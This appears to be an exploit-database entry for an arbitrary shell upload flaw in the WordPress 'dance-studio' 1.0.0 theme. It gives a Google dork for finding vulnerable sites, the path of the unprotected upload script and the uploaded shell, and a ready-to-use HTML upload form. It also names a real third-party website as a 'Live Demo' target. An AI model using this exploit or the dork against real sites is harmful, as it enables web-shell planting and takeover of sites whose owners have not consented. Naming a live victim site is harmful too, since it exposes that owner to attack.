id: 26979
date: 02/13/2017
title: Wordpress dance studio 1.0.0 Themes - Arbitrary Shell Upload Vulnerbility
author: xBADGIRL21
cves: 

##################################################################################
# Exploit Title : Wordpress Themes dance-studio - Arbitrary Shell Upload vulnerbility
# Author : xBADGIRL21
# Google Dork: inurl:/wp-content/themes/dance-studio
# Date: 12-11-2017
# Vendor Homepage:  http://themes.cmsmasters.net/?theme=dance-studio by looplava
# Version: 1.0.0
# Tested on: Win 7
# MyBlog : http://xbadgirl21.blogspot.com/
# Video Proof :  https://youtu.be/unEP_-WWMy8
#################################################################################
# [*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
#################################################################################
 
# [!] Exploit : http://127.0.0.1/wordpress/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php
 
# [!] Shell Path    : http://127.0.0.1//wp-content/uploads/
 
#################################################################################
# [*] CoDe: 
#################################################################################
<html> 
<body> 
<form 
action="http://127.0.0.1/wordpress/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php"
method="POST" enctype="multipart/form-data"> 
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form> 
</body> 
</html>
#################################################################################
# [*] Live Demo: 
#################################################################################
# https://abbyleedancecompany.com
#################################################################################
# [*] ABOUT: 
#################################################################################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#################################################################################


#  0day.today [2023-03-21]  #